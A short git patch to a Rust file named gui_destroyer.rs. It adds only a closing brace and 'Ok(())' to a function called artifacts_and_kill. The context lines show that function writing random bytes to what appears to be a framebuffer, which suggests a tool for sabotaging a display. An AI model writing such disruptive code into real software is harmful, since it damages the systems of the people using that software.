From c3ebda7ce605e40e6bc43b3d492f0fb0a8153e59 Mon Sep 17 00:00:00 2001 From: Namilskyy Date: Wed, 29 Oct 2025 23:49:52 +0300 Subject: Building release --- src/non_critical/gui_destroyer.rs | 3 +++ 1 file changed, 3 insertions(+) (limited to 'src/non_critical/gui_destroyer.rs') diff --git a/src/non_critical/gui_destroyer.rs b/src/non_critical/gui_destroyer.rs index a7d1c75..3c72def 100644 --- a/src/non_critical/gui_destroyer.rs +++ b/src/non_critical/gui_destroyer.rs @@ -20,7 +20,10 @@ fn artifacts_and_kill(root: bool) -> Result<(), std::io::Error> { let garbage: Vec = (0..1024).map(|_| rng.gen()).collect(); let _ = fb.write(&garbage); } + } + + Ok(()) } -- cgit v1.2.3